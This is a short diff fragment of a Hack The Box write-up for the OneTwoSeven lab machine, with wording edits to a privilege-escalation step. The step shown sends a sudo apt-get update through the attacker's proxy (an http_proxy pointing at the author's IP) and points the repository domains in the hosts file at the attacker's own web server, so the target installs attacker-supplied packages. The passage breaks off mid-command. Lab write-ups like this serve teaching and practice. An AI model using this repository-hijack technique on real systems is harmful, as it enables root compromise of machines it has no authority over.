slemire/slemire.github.io/_posts/2019-08-31-htb-writeup-onetwoseven.md

 ![](/assets/images/htb-writeup-onetwoseven/burp.png)

-Then modified `/etc/hosts` to point the apt repositories to my own box:
+Then modify `/etc/hosts` to point the apt repositories to my own box:

 ```
 127.0.0.1 packages.onetwoseven.htb de.deb.devuan.org
 ```

 I can force the server to connect through my Kali VM by setting the `http_proxy` variable so it uses the Burp proxy.
-The local host file points the repo domain to 127.0.0.1 so it proxies to my Python webserver.
+My local host file points the repo domain to 127.0.0.1 so it connects to my Python webserver.

 ```
 www-admin-data@onetwoseven:/$ sudo http_proxy=http://10.10.14.23:8080 apt-get update